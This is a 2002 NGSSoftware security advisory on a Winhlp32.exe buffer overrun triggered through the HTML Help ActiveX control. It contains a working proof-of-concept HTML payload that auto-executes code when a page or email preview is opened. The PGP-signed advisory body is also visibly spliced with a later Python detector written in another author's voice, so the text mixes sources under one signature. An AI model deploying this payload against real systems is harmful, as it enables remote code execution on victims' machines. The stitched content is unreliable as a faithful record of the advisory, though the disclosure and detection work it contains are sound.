Winhelp32 Remote Buffer Overrun

From: Next Generation Insight Security Research Team (mark@ngssoftware.com)
Date: 08/02/02


From: "Next Generation Insight Security Research Team" <mark@ngssoftware.com>
To: <bugtraq@securityfocus.com>, <ntbugtraq@listser.ntbugtraq.com>
Date: Thu, 1 Aug 2002 18:59:31 -0700


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

NGSSoftware Insight Security Research Advisory

Name: Winhlp32.exe Remote Buffer Overrun
Systems Affected: Win2K Platform
Severity: Critical
Category: Remote Buffer Overrun
Vendor URL: http://www.microsoft.com
Author: Mark Litchfield (mark@ngssoftware.com)
Date: 1st August 2002
Advisory number: #NISR01082002

Description
***********

Many of the features available in HTML Help are implemented through
the HTML Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX
control is used to provide navigation features (such as a table of
contents), to display secondary windows and pop-up definitions, and
to provide other features. The HTML Help ActiveX control can be used
from topics in a compiled Help system as well as from HTML pages
displayed in a Web browser. The functionality provided by the HTML
Help ActiveX control will run in the HTML Help Viewer or in any
browser that supports ActiveX technology, such as Internet Explorer
(version 3.01 or later). Some features, as with the WinHlp Command,
provided by the HTML Help ActiveX control are meant to be available
only when it is used from a compiled HTML Help file (.chm) that is
displayed by using the HTML Help Viewer.

Details
*******

Winhlp32.exe is vulnerable to a buffer overrun attack via the Item
parameter of the WinHlp command. The Item parameter is used to
specify the file path of the WinHelp (.hlp) file in which the WinHelp
topic is stored, together with the window name of the target window.
Using this overrun, an attacker can successfully execute arbitrary
code on a remote system either by encouraging the victim to visit a
particular web page, whereupon the code would execute automatically,
or by including the exploit within the source of an email. In the
case of email, execution would occur automatically when the mail
appears in the preview pane and ActiveX objects are allowed (this is
allowed by default; the Internet security setting would have to be
set to High to prevent exploitation of this vulnerability). Any
exploit would execute in the context of the logged-on user.

Visual POC Exploit
******************

This POC will simply display Calculator. Please note that this was
written on a Win2K PC with SP2 installed. I have not tested it on
anything else.

<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width"
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
VALUE="WinHelp"><PARAM NAME="Item1"
VALUE="3Phcalc4$&#402;&#1;PVw3P&#8221;wAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP
PPPQQQQRRRRSSSSTTTAAAA&#11;wABCDEFGH&#402;&#21;gMyWindow"><PARAM
NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>
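As a defender-side illustration of the Details section, the following is an added example (my own code, not NGSSoftware's, Microsoft's, or part of the advisory) that scans a web page or mail body for the HTML Help ActiveX control being instantiated with the WinHelp command and an oversized Item1 value, which is the pattern the PoC above relies on. The CLSID and the Command/Item1 parameter names are taken from the PoC; the 260-character Item1 threshold, the count_control_refs helper and the three sample documents are assumptions constructed for this example. Note the caveat in the comments: Python's html.unescape() discards numeric references to control codes (such as &#1;), so those are counted in the raw tag text rather than in the decoded value.

```python
"""
Flag HTML (a web page or an e-mail body) that instantiates the HTML Help
ActiveX control with the WinHelp command and an oversized Item1 value.
"""
import re
from dataclasses import dataclass
from html.parser import HTMLParser
from typing import Dict, List, Optional

# CLSID of the HTML Help ActiveX control (HHCtrl.ocx), as used in the advisory's PoC.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

# Assumption: a legitimate Item1 ("file.hlp>windowname") fits in a MAX_PATH-sized
# buffer, so anything longer than 260 characters is treated as suspicious.
ITEM1_MAX_LEN = 260

# Numeric character references (&#1; &#x15; ...); html.unescape() silently drops
# those that name C0 control codes, so they must be counted in the raw tag text.
NUMERIC_REF = re.compile(r"&#(x[0-9a-f]+|[0-9]+);", re.IGNORECASE)


def count_control_refs(raw: str) -> int:
    """Number of numeric character references below U+0020 in raw markup."""
    count = 0
    for m in NUMERIC_REF.finditer(raw):
        token = m.group(1)
        value = int(token[1:], 16) if token[0] in "xX" else int(token)
        if value < 0x20:
            count += 1
    return count


@dataclass
class Finding:
    object_id: str      # the <OBJECT id=...> attribute, if present
    command: str        # the Command PARAM as written
    item1_len: int      # length of the decoded Item1 PARAM value
    reasons: List[str]  # why the object was flagged


class HHCtrlScanner(HTMLParser):
    """Collect the <PARAM>s of every HHCtrl <OBJECT> and evaluate each one."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[Finding] = []
        self._current: Optional[Dict] = None  # the HHCtrl object being parsed

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases names and decodes entities in attribute values,
        # so wrapped or entity-encoded payloads are examined in decoded form.
        a = {name: (value or "") for name, value in attrs}
        if tag == "object":
            clsid = a.get("classid", "").lower().replace("clsid:", "")
            if clsid == HHCTRL_CLSID:
                self._current = {"id": a.get("id", ""), "params": {}, "ctrl_refs": 0}
        elif tag == "param" and self._current is not None:
            self._current["params"][a.get("name", "").lower()] = a.get("value", "")
            self._current["ctrl_refs"] += count_control_refs(self.get_starttag_text() or "")

    def handle_endtag(self, tag):
        if tag == "object" and self._current is not None:
            self._evaluate(self._current)
            self._current = None

    def _evaluate(self, obj: Dict) -> None:
        command = obj["params"].get("command", "")
        item1 = obj["params"].get("item1", "")
        reasons: List[str] = []
        if command.lower() == "winhelp":
            # The advisory notes WinHelp is meant only for compiled .chm content,
            # so its appearance in web or mail HTML is itself worth recording.
            reasons.append("WinHelp command used outside a compiled .chm")
            if len(item1) > ITEM1_MAX_LEN:
                reasons.append(f"Item1 length {len(item1)} exceeds {ITEM1_MAX_LEN}")
            if obj["ctrl_refs"]:
                reasons.append(f"{obj['ctrl_refs']} control-code character reference(s) in PARAMs")
        if reasons:
            self.findings.append(Finding(obj["id"], command, len(item1), reasons))


def scan_html(text: str) -> List[Finding]:
    scanner = HHCtrlScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings


# Constructed samples (not the advisory's payload).
BENIGN_HTML = (
    '<OBJECT classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11" id=related>'
    '<PARAM NAME="Command" VALUE="ALink"><PARAM NAME="Item1" VALUE="intro.chm">'
    "</OBJECT>"
)
OVERLONG_HTML = (
    "<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 id=winhelp>"
    '<PARAM NAME="Command" VALUE="WinHelp">'
    '<PARAM NAME="Item1" VALUE="c:\\help\\foo.hlp>' + "A" * 300 + '">'
    "</OBJECT><SCRIPT>winhelp.HHClick()</SCRIPT>"
)
ENCODED_HTML = (
    "<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 id=winhelp>"
    '<PARAM NAME="Command" VALUE="WinHelp">'
    '<PARAM NAME="Item1" VALUE="foo.hlp>&#1;&#x15;win"></OBJECT>'
)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_HTML), ("overlong", OVERLONG_HTML), ("encoded", ENCODED_HTML)):
        for f in scan_html(doc):
            print(f"[{label}] id={f.object_id!r} command={f.command} item1_len={f.item1_len}: "
                  + "; ".join(f.reasons))
```

Run on a mail gateway or web proxy, the benign ALink use produces no finding, the 300-character Item1 is reported for its length, and the entity-encoded variant is caught through the raw-markup count even though the decoded value is short. The length threshold is a heuristic: the advisory gives no buffer size, so tune ITEM1_MAX_LEN to the longest legitimate "path.hlp>window" string seen in your own content.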

Fix Information
***************

NGSSoftware alerted Microsoft to these problems on the 6th March
2002. NGSSoftware highly recommends installing Microsoft Windows 2000
SP3, as the fix has been built into this service pack, available from
http://www.microsoft.com
An alternative to this patch would be to ensure that the security
setting found in Internet Options is set to High. Despite the Medium
setting stating that unsigned ActiveX controls will not be
downloaded, Kylie will still execute Calc.exe. Another alternative
would be to remove winhlp32.exe if it is not required within your
environment.
A check for these issues has been added to Typhon II, about which
more information is available from the NGSSoftware website,
http://www.ngssoftware.com.

Further Information
*******************

For further information about the scope and effects of buffer
overflows, please see

http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBPUnnf8a1CFAff8bXEQLz8gCgm4lbs5Fs2WUH5Au2cAkG0JQKKLMAn13p
a+qSkYWrz7uspZcqqRTc2r0C
=2PKN
-----END PGP SIGNATURE-----


